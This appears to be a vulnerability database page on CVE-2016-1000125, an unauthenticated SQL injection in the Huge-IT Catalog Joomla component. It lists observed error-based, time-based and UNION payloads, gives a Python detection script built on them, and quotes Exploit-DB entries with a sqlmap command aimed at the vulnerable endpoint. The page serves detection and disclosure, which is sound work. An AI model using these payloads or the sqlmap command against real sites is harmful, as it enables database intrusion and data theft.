CVE-2016-1000125
Published: 2016-10-06
CVE-2016-1000125: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Priority: P2 (62) · CVSS 3.0 base score 9.8, critical
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit available (see the Exploit-DB entries below)
EPSS: 2.50% (82.7th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| huge-it | huge-it_catalog | — | — |
Detection & IOCs (extracted from sources)
Observed payloads (POST bodies sent to /components/com_catalog/ajax_url.php):
- error-based: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
- time-based blind: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
- UNION-based: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
- Monitor POST requests to /components/com_catalog/ajax_url.php carrying post=load_more_elements_into_catalog; catalog_id is concatenated into the SQL query without sanitisation and is the primary injection point.
- Error-based injection: FLOOR(RAND(0)*2) and GROUP BY CONCAT(...) patterns in the catalog_id value of the POST body.
- Time-based blind injection: SLEEP() calls in the catalog_id value sent to ajax_url.php.
- UNION-based injection: UNION ALL SELECT with 15 columns in the POST body to ajax_url.php (the column count of the observed payload above).
- A burst of HTTP 500 responses from ajax_url.php within a short window indicates active probing: error-based payloads deliberately provoke database errors, and sqlmap sends many of them in quick succession.
- The vulnerability is unauthenticated: no session or login is required, so any POST to ajax_url.php with post=load_more_elements_into_catalog from an unauthenticated source warrants inspection.
- ajax_url.php is reachable directly under /components/com_catalog/ and performs no authentication check, so no Joomla session token or user privilege is enforced before the injectable code path runs.
- The sqlmap command in the Exploit-DB entry marks old_count, count_into_page, show_thumbs, show_description and parmalink as injection points alongside catalog_id; the sqlmap output shown there confirms only catalog_id (parameter #1), so detection rules should still cover all six parameters rather than catalog_id alone.
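The indicators above, turned into runnable detection logic as an added example (this is not code from the advisory, the Exploit-DB entries or the Huge-IT component). It parses each POST body instead of grepping the raw request, checks all six parameters the sqlmap command marks, classifies a payload as error-based, time-based or UNION-based (counting columns at the top level so that CONCAT(...) is one column), and keeps a sliding-window counter of HTTP 500 responses from ajax_url.php. The (method, path, body) record shape, the sample traffic and the burst threshold are constructed assumptions.

```python
"""Detection logic for CVE-2016-1000125 probing of
/components/com_catalog/ajax_url.php, run over sample request records.

Added example for this page: not code from the advisory, the Exploit-DB
entries or the Huge-IT component.  The (method, path, body) record shape,
SAMPLE_REQUESTS and the burst threshold are constructed assumptions; the
patterns encode the indicators listed on the page.
"""
import re
from collections import deque
from urllib.parse import parse_qs

VULN_PATH = "/components/com_catalog/ajax_url.php"
VULN_ACTION = "load_more_elements_into_catalog"
# Every POST parameter the page's sqlmap command marks as an injection point.
WATCHED_PARAMS = ("catalog_id", "old_count", "count_into_page",
                  "show_thumbs", "show_description", "parmalink")

# Indicator patterns, matched case-insensitively against each parameter value.
ERROR_BASED = re.compile(
    r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)|GROUP\s+BY\s+CONCAT", re.I)
TIME_BASED = re.compile(r"\bSLEEP\s*\(", re.I)
UNION_BASED = re.compile(r"UNION\s+ALL\s+SELECT\s+(.+?)(?:--|#|$)", re.I | re.S)


def union_column_count(value):
    """Column count of a UNION ALL SELECT payload in value, or 0 if absent."""
    m = UNION_BASED.search(value)
    if not m:
        return 0
    # Count top-level commas only: CONCAT(a,b,c) is a single column.
    depth, cols = 0, 1
    for ch in m.group(1):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "," and depth == 0:
            cols += 1
    return cols


def classify_request(method, path, body):
    """Return [(parameter, technique), ...] findings for one HTTP request."""
    if method != "POST" or path != VULN_PATH:
        return []
    # parse_qs percent-decodes and splits each pair on the first '=' only,
    # so '1973=1973' inside a payload stays part of the value.
    params = parse_qs(body, keep_blank_values=True)
    if params.get("post", [""])[0] != VULN_ACTION:
        return []
    findings = []
    for name in WATCHED_PARAMS:  # all six parameters, not only catalog_id
        for value in params.get(name, []):
            if ERROR_BASED.search(value):
                findings.append((name, "error-based"))
            if TIME_BASED.search(value):
                findings.append((name, "time-based"))
            cols = union_column_count(value)
            if cols:
                findings.append((name, "union-based:%d-columns" % cols))
    return findings


def scan(records):
    """Map record index -> findings for every (method, path, body) that matches."""
    hits = {}
    for i, (method, path, body) in enumerate(records):
        findings = classify_request(method, path, body)
        if findings:
            hits[i] = findings
    return hits


class StatusSpikeDetector:
    """Flags a burst of HTTP 500 responses from ajax_url.php in a sliding window."""

    def __init__(self, threshold=20, window_seconds=60):  # assumed thresholds
        self.threshold = threshold
        self.window = window_seconds
        self.times = deque()

    def observe(self, ts, path, status):
        """Feed one response (epoch seconds); True once the threshold is crossed."""
        if path != VULN_PATH or status != 500:
            return False
        self.times.append(ts)
        while self.times and ts - self.times[0] > self.window:
            self.times.popleft()
        return len(self.times) >= self.threshold


# Constructed sample traffic: a benign request, the three payload shapes from
# this page, an injection in a secondary parameter, and an unrelated GET.
_BASE = ("prod_page=1&post=" + VULN_ACTION + "&catalog_id=%s&old_count=%s"
         "&count_into_page=&show_thumbs=&show_description=&parmalink=")
SAMPLE_REQUESTS = [
    ("POST", VULN_PATH, _BASE % ("1", "")),
    ("POST", VULN_PATH, _BASE % ("-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#", "")),
    ("POST", VULN_PATH, _BASE % ("(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)", "")),
    ("POST", VULN_PATH, _BASE % ("-5943 UNION ALL SELECT " + ",".join(["2434"] * 14) + ",CONCAT(0x717a627871,0x4142,0x716b787671)-- FvOy", "")),
    ("POST", VULN_PATH, _BASE % ("1", "1 AND SLEEP(5)")),
    ("GET", "/index.php", ""),
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_REQUESTS).items():
        print(idx, findings)
```

Parsing the body first matters because the same payloads can arrive percent-encoded or with `+` for spaces; a regex over the raw body would miss them. The patterns tolerate whitespace variations but not MySQL inline comments (`/**/`) between tokens, so treat them as a starting point for a WAF or SIEM rule rather than a complete signature, and report the UNION column count rather than hard-coding 15 so the same rule catches reconnaissance with other column counts.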
CVSS provenance
- NVD, CVSS v3.0: 9.8 CRITICAL (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- NVD, CVSS v2.0: 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
No detection rules found.
Exploit-DB: Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection
exploitdb · 2017-08-31 · CVSS 9.8 (CRITICAL)
Note that the entry's own header below names Huge-IT Catalog v1.0.7, not the Portfolio Gallery plugin.
---
# Exploit Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
# Date: 2016-09-16
# Exploit Author: Larry W. Cashdollar, @_larry0
# Vendor Homepage: http://huge-it.com/joomla-catalog/
# Software Link:
# Version: 1.0.7
# Tested on: Linux
# CVE : CVE-2016-1000125
# Advisory: http://www.vapidlabs.com/advisory.php?v=171
# Exploit:
$ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*"

Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: prod_page=1&post=load_more
Exploit-DB: Joomla! Component Catalog 1.0.7 - SQL Injection
exploitdb · 2016-09-16 · CVSS 9.8 (CRITICAL)
---
Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-catalog/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: [email protected]
Description:
Huge-IT Product Catalog is made for demonstration, sale, advertisements for your products. Imagine a stand with a
variety of catalogs with a specific product category. To imagine is not difficult, to use is even easier.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL into functions via 'load_more_elements_into_catalog' located in ajax_url.php.
Vulnerable Code in: ajax_url.php
define('_JEXEC', 1);
defined('_JEXEC')
No writeups or analysis indexed.